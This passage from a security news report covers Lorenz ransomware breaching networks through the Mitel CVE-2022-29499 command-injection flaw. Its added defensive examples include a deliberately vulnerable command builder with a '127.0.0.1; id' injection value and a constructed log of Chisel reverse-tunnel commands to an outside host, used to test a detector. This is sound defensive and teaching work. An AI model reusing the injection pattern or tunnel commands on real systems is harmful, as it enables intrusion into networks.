Lorenz ransomware penetrates networks through a hole in Mitel VoIP devices

While investigating a ransomware incident, Arctic Wolf Networks researchers found that Lorenz ransomware operators had used a critical vulnerability in MiVoice Connect, Mitel's VoIP communications product, to gain initial access to the corporate network.

The flaw (CVE-2022-29499, CVSS 9.8) sits in the Mitel Service Appliance component. It lets an unauthenticated attacker reach a diagnostic script and inject commands through it, which leads to remote code execution on the appliance.
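The bug class behind a flaw like this, as an added illustration that is not Mitel's code and not taken from any published analysis: an internet-facing diagnostic script that hands unauthenticated request input to a shell, shown beside a hardened version. The `ping` diagnostic, the `host`/`token` parameter names and the shared-secret token check are assumptions made for the example.

```python
"""Added illustration (not Mitel's code) of the bug class the article describes:
a diagnostic script that passes unauthenticated request input to a shell.
The 'ping' diagnostic, parameter names and token check are assumed."""
import hmac
import ipaddress
import subprocess


def build_diag_command_vulnerable(host: str) -> str:
    # Anti-pattern: request data interpolated into a shell command string that
    # is later run with shell=True. "127.0.0.1; id" turns into two commands.
    return f"ping -c 1 {host}"


def validate_target(host: str) -> str:
    # Allow-list: only an IP literal passes; shell metacharacters, hostnames
    # and whitespace are rejected before anything reaches a process.
    return str(ipaddress.ip_address(host.strip()))   # raises ValueError


def build_diag_command_hardened(host: str) -> list[str]:
    # argv list, never a shell: the target is exactly one argument.
    return ["ping", "-c", "1", validate_target(host)]


def run_diag_hardened(host: str) -> str:
    # Execution path for the hardened builder (shell=False, bounded runtime).
    return subprocess.run(build_diag_command_hardened(host), shell=False,
                          capture_output=True, text=True, timeout=5).stdout


def handle_diag_request(params: dict, expected_token: str):
    """Return ("denied", None), ("rejected", None) or ("ok", argv).

    Fixing the injection alone is not enough: a diagnostic endpoint reachable
    without authentication is the other half of the problem, so the handler
    refuses unauthenticated calls first (constant-time compare; the
    shared-secret scheme is assumed for the example)."""
    supplied = params.get("token", "")
    if not hmac.compare_digest(supplied.encode(), expected_token.encode()):
        return ("denied", None)
    try:
        return ("ok", build_diag_command_hardened(params.get("host", "")))
    except ValueError:
        return ("rejected", None)


if __name__ == "__main__":
    evil = "127.0.0.1; id"
    print("vulnerable builds:", build_diag_command_vulnerable(evil))
    print("hardened, no token:", handle_diag_request({"host": evil}, "s3cret"))
    print("hardened, injection:", handle_diag_request({"host": evil, "token": "s3cret"}, "s3cret"))
    print("hardened, valid:", handle_diag_request({"host": "10.0.0.5", "token": "s3cret"}, "s3cret"))
```

The two fixes are deliberately independent: the argv list plus allow-list validation removes the injection, and the token check removes the unauthenticated reachability; a patch that does only one of them leaves a management appliance exposed either to anyone on the internet or to any authenticated user.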

As an interim mitigation, the vendor released a remediation script in April; according to Arctic Wolf, the issue was fully fixed in July with the release of MiVoice Connect (MiVC) 19.3. A Shodan search by security researcher Kevin Beaumont turned up more than 20,000 internet-exposed and potentially vulnerable devices, most of them in the US and UK.

The CVE-2022-29499 exploit gave the attackers tracked by Arctic Wolf a reverse shell on the appliance, from which they pivoted further into the network using Chisel, an open-source tunnelling tool. Encryption was then carried out with the Lorenz ransomware itself (on ESXi servers) and with Microsoft's legitimate BitLocker tool.
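A detection a defender would want for the Chisel stage of the chain above, as an added example that is not from Arctic Wolf's report: scan process-creation logs for `chisel` invocations and flag the ones that set up reverse tunnels (`R:` remotes on a client, `--reverse` on a server), since those are what let an outside operator reach inward. The log format and the sample lines are constructed for the example; the set of value-less Chisel flags is assumed from the Chisel CLI and should be checked against the version you actually see.

```python
"""Added example (not from the Lorenz/Arctic Wolf report): flag Chisel tunnel
usage in process-creation logs. The 'key=value cmd="..."' log format and the
sample lines are constructed; real sources (auditd, Sysmon, EDR) differ and
only the command-line parsing is the point."""
import os
import re

# Chisel flags that take no value; every other dash-prefixed option is assumed
# to consume the token that follows it (assumption about the Chisel CLI).
BOOLEAN_FLAGS = {"-v", "--reverse", "--tls-skip-verify", "--help", "-h", "--pid"}

CMD_RE = re.compile(r'cmd="(.*)"\s*$')
FIELD_RE = re.compile(r'(\w+)=(\S+)')

# Constructed sample log: one benign diagnostic, two reverse tunnels from the
# appliance, a reverse server on a Windows host and a plain forward tunnel.
CONSTRUCTED_PROCESS_LOG = r"""
2022-09-12T10:14:03Z host=mitel-sa01 user=www-data cmd="/bin/sh -c 'ping -c 1 10.0.0.5'"
2022-09-12T10:15:41Z host=mitel-sa01 user=www-data cmd="/tmp/chisel client 198.51.100.7:443 R:socks"
2022-09-12T10:16:02Z host=mitel-sa01 user=www-data cmd="/tmp/chisel client --fingerprint AbCd 198.51.100.7:443 R:0.0.0.0:2222:127.0.0.1:22"
2022-09-12T10:20:11Z host=fileserver01 user=SYSTEM cmd="C:\Windows\Temp\chisel.exe server --reverse --port 8080"
2022-09-12T10:21:00Z host=fileserver01 user=admin cmd="C:\Tools\chisel.exe client 10.0.0.9:8080 3389:10.0.0.9:3389"
"""


def split_chisel_args(tokens):
    """Return (positionals, has_reverse_flag) for the tokens after 'chisel <mode>'."""
    positionals, reverse_flag, skip = [], False, False
    for tok in tokens:
        if skip:
            skip = False
            continue
        if tok.startswith("-"):
            if tok == "--reverse":
                reverse_flag = True
            elif tok not in BOOLEAN_FLAGS and "=" not in tok:
                skip = True          # option value follows as the next token
            continue
        positionals.append(tok)
    return positionals, reverse_flag


def classify_chisel(cmdline):
    """Return a finding dict if the command line runs chisel, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        name = os.path.basename(tok.replace("\\", "/")).lower()
        if name not in ("chisel", "chisel.exe"):
            continue
        mode = tokens[i + 1] if i + 1 < len(tokens) else ""
        positionals, reverse_flag = split_chisel_args(tokens[i + 2:])
        if mode == "client":
            # First positional is the chisel server; the rest are remotes.
            # 'R:' remotes let the server (attacker side) open connections
            # back through the client into the victim network.
            server, remotes = (positionals[0] if positionals else ""), positionals[1:]
            return {"mode": mode, "server": server, "remotes": remotes,
                    "reverse": any(r.startswith("R:") for r in remotes),
                    "socks": any(r.split(":")[-1] == "socks" for r in remotes)}
        return {"mode": mode, "server": "", "remotes": [],
                "reverse": reverse_flag if mode == "server" else False, "socks": False}
    return None


def find_chisel_tunnels(lines):
    """Parse each log line, attach host/user fields and collect chisel findings."""
    findings = []
    for line in lines:
        m = CMD_RE.search(line)
        if not m:
            continue
        finding = classify_chisel(m.group(1))
        if finding is None:
            continue
        fields = dict(FIELD_RE.findall(line.split('cmd="', 1)[0]))
        finding.update(host=fields.get("host", "?"), user=fields.get("user", "?"))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_chisel_tunnels(CONSTRUCTED_PROCESS_LOG.splitlines()):
        flag = "REVERSE TUNNEL" if f["reverse"] else "chisel"
        print(f"{flag}: {f['host']} {f['user']} {f['mode']} {f['server']} {f['remotes']}")
```

On a VoIP appliance there is no legitimate reason for a web-server user to spawn any tunnelling binary, so in practice the `user=www-data` plus `chisel` combination alone is worth an alert; the reverse/forward distinction matters more on general-purpose hosts where administrators may use Chisel themselves.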

This year, another critical vulnerability
